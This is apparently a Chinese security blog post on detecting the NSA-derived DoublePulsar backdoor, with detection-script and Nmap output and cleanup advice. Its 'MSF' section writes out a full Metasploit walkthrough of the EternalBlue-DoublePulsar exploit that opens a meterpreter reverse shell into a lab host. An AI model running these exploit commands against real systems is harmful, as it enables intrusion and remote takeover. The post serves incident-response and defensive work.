0x00 前言

一般的,DoublePulsar后门会和Wannacry一块出没。而这就需要在做应急响应或者内网主机安全排查的时候来进行检测。

0x01 DoublePulsar后门检测

DoublePulsar简介

DoublePulsar是由美国国家安全局(NSA)方程式组开发的后门植入工具,于2017年初由影子经纪人(The Shadow Brokers)泄露。该工具仅在几周内感染了超过200,000台Microsoft Windows计算机,并在2017年5月的WannaCry勒索软件攻击中与EternalBlue一起使用。

DoublePulsar以内核模式运行, 属于Rootkit,这使网络犯罪分子能够对计算机系统进行高级别的控制。安装后,它使用三个命令:ping、kill和 exec、exec可用于将恶意软件加载到系统上。

具体漏洞分析参考:https://www.freebuf.com/news/138725.html

DoublePulsar后门检测方法

GitHub检测脚本

项目地址:https://github.com/countercept/doublepulsar-detection-script

以Python2运行,分为SMB和RDP两个脚本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@kali:~# python detect_doublepulsar_smb.py --ip 192.168.175.128
[-] [192.168.175.128] No presence of DOUBLEPULSAR SMB implant

root@kali:~# python detect_doublepulsar_smb.py --ip 192.168.175.128
[+] [192.168.175.128] DOUBLEPULSAR SMB IMPLANT DETECTED!!!

root@kali:~# python detect_doublepulsar_rdp.py --file ips.list --verbose --threads 1
[*] [192.168.175.141] Sending negotiation request
[*] [192.168.175.141] Server explicitly refused SSL, reconnecting
[*] [192.168.175.141] Sending non-ssl negotiation request
[*] [192.168.175.141] Sending ping packet
[-] [192.168.175.141] No presence of DOUBLEPULSAR RDP implant
[*] [192.168.175.143] Sending negotiation request
[*] [192.168.175.143] Server chose to use SSL - negotiating SSL connection
[*] [192.168.175.143] Sending SSL client data
[*] [192.168.175.143] Sending ping packet
[-] [192.168.175.143] No presence of DOUBLEPULSAR RDP implant
[*] [192.168.175.142] Sending negotiation request
[*] [192.168.175.142] Sending client data
[*] [192.168.175.142] Sending ping packet
[+] [192.168.175.142] DOUBLEPULSAR RDP IMPLANT DETECTED!!!

root@kali:~# python2 detect_doublepulsar_smb.py --ip 192.168.175.136 --uninstall
[+] [192.168.175.136] DOUBLEPULSAR SMB IMPLANT DETECTED!!! XOR Key: 0x7c3bf3c1
[+] [192.168.175.136] DOUBLEPULSAR uninstall successful

Nmap

参考:https://nmap.org/nsedoc/scripts/smb-double-pulsar-backdoor.html

1
nmap -p 445 <target> --script=smb-double-pulsar-backdoor

扫描输出:

1
2
3
4
5
6
7
8
9
10
11
12
| smb-double-pulsar-backdoor:
|   VULNERABLE:
|   Double Pulsar SMB Backdoor
|     State: VULNERABLE
|     Risk factor: HIGH  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
|       The Double Pulsar SMB backdoor was detected running on the remote machine.
|
|     Disclosure date: 2017-04-14
|     References:
|       https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
|       https://github.com/countercept/doublepulsar-detection-script
|_      https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation

MSF

如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# 下载对应的MSF插件并复制到目标目录中
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd Eternalblue-Doublepulsar-Metasploit/
cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

# 安装依赖
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 --fix-missing

# 创建.wine/drive_c目录,否则后续利用漏洞时会出现目录不存在错误
mkdir -p /root/.wine/drive_c

# 开启MSF并重新加载插件
msfconsole
reload_all

# 漏洞利用
use exploit/windows/smb/eternalblue_doublepulsar
set rhost 192.168.200.142
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.200.130
set PROCESSINJECT explorer.exe # 注意,需要设置PROCESSINJECT,使用默认值并没成功,改PROCESSINJECT为explorer.exe成功
run

防御方法

如果扫描出来,可以应用前面的检测脚本清理掉:

1
python2 detect_doublepulsar_smb.py --ip 192.168.175.136 --uninstall

然后,安装补丁。